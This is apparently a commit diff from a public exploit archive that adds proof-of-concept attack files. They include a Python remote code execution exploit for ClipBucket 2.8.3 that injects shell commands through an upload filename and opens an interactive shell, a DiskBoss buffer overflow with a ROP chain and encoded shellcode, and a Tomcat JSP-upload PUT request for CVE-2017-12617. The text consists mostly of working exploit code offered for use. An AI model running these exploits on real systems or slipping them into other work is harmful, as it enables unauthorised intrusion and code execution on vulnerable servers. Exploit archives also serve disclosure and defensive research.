# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE)
|
||||
# Date: 2017-10-04
|
||||
# Exploit Author: Esecurity.ir
|
||||
# Vendor Homepage: https://clipbucket.com/
|
||||
# Version: 2.8.3
|
||||
# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
|
||||
# Usage Exploit : exploit.py http://target.com/path/
|
||||
|
||||
|
||||
|
||||
import sys,os
|
||||
try:
|
||||
import requests
|
||||
except Exception as e:
|
||||
print 'please install module requests!'
|
||||
sys.exit()
|
||||
img = 'temp.jpg'
|
||||
uploadUrl = "api/file_uploader.php"
|
||||
h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'}
|
||||
|
||||
def getShell(url):
|
||||
try:
|
||||
r = requests.get(url+'cache/1.log',headers=h)
|
||||
if r.status_code == 200:
|
||||
return r.content
|
||||
else:
|
||||
print 'Sorry site is not vulnerable '
|
||||
sys.exit()
|
||||
except Exception as e:
|
||||
print e
|
||||
sys.exit()
|
||||
|
||||
def exploit(url):
|
||||
while (1):
|
||||
cmd = raw_input('$')
|
||||
if cmd == '' or cmd == 'exit':
|
||||
break
|
||||
file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')}
|
||||
data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'}
|
||||
try:
|
||||
r = requests.post(url+uploadUrl, files=file_,data=data,headers=h)
|
||||
if r.status_code == 200:
|
||||
if '"success":"yes"' in r.content:
|
||||
print getShell(url)
|
||||
else:
|
||||
print 'Sorry site is not vulnerable '
|
||||
break
|
||||
else:
|
||||
print 'Sorry site is not vulnerable '
|
||||
break
|
||||
except Exception as e:
|
||||
print e
|
||||
break
|
||||
if not os.path.exists(img):
|
||||
print 'please create tiny image file name is ' + img
|
||||
sys.exit()
|
||||
|
||||
if len(sys.argv) == 2 :
|
||||
exploit(sys.argv[1])
|
||||
else:
|
||||
print "Usage Exploit : exploit.py http://target.com/path/";
|
||||
102
platforms/windows/local/42951.py
Executable file
102
platforms/windows/local/42951.py
Executable file
|
|
@ -0,0 +1,102 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
#========================================================================================================================
|
||||
# Exploit Author: C4t0ps1s
|
||||
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
|
||||
# Date: 03-10-2017
|
||||
# Twitter: @C4t0ps1s
|
||||
# Email: C4t0ps1s@gmail.com
|
||||
# Vulnerable Software: DiskBoss Enterprise v8.4.16
|
||||
# Vendor Homepage: http://www.diskboss.com
|
||||
# Version: v8.4.16
|
||||
# Software Link: http://www.diskboss.com/downloads.html
|
||||
# Tested On: Windows 10 x64
|
||||
#
|
||||
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
|
||||
#
|
||||
# To reproduce the code execution:
|
||||
# 1. Click Server
|
||||
# 2. Click Connect
|
||||
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
|
||||
#
|
||||
#========================================================================================================================
|
||||
|
||||
import struct
|
||||
|
||||
buff = "a"*1312
|
||||
|
||||
#push esp | pop esi | retn 4
|
||||
buff += struct.pack("<L",0x65247445)
|
||||
|
||||
#mov eax, esi | pop esi | retn 4
|
||||
buff += struct.pack("<L",0x65273f24)
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
|
||||
#pop ebx | retn
|
||||
buff += struct.pack("<L",0x65222936)
|
||||
buff += "PADD"
|
||||
buff += struct.pack("<L",0x7f7f7f7f)
|
||||
|
||||
#add eax, ebx | pop esi | pop ebx | retn 0xc
|
||||
buff += struct.pack("<L",0x65222d7d)
|
||||
buff += "PADD"
|
||||
buff += struct.pack("<L",0x7f7f7f7f)
|
||||
|
||||
#add eax, ebx | pop esi | pop ebx | retn 0xc
|
||||
buff += struct.pack("<L",0x65222d7d)
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += struct.pack("<L",0x0101015a)
|
||||
|
||||
#add eax, ebx | pop esi | pop ebx | retn 0xc
|
||||
buff += struct.pack("<L",0x65222d7d)
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
buff += "PADD"
|
||||
|
||||
#jmp eax
|
||||
buff += struct.pack("<L",0x65217d28)
|
||||
|
||||
#inc eax
|
||||
buff += "\x40"*20
|
||||
|
||||
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
|
||||
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
|
||||
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
|
||||
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
|
||||
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
|
||||
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
|
||||
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
|
||||
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
|
||||
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
|
||||
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
|
||||
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
|
||||
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
|
||||
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
|
||||
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
|
||||
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
|
||||
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
|
||||
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
|
||||
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
|
||||
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
|
||||
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
|
||||
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
|
||||
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
|
||||
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
|
||||
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
|
||||
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
|
||||
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
|
||||
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
|
||||
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
|
||||
|
||||
buff += sc
|
||||
|
||||
f = open("shareName.txt","wb")
|
||||
f.write(buff)
|
||||
f.close()
|
||||
64
platforms/windows/remote/42952.py
Executable file
64
platforms/windows/remote/42952.py
Executable file
File diff suppressed because one or more lines are too long
22
platforms/windows/webapps/42953.txt
Executable file
22
platforms/windows/webapps/42953.txt
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
|
||||
|
||||
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
|
||||
This JSP could then be requested and any code it contained would be executed by the server.
|
||||
|
||||
The PoC is like this:
|
||||
|
||||
PUT /1.jsp/ HTTP/1.1
|
||||
Host: 192.168.3.103:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Referer: http://192.168.3.103:8080/examples/
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
|
||||
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
|
||||
Connection: close
|
||||
Content-Length: 26
|
||||
|
||||
<% out.println("hello");%>
|
||||
|
||||
It is the bypass for CVE-2017-12615
|
||||
Loading…
Add table
Reference in a new issue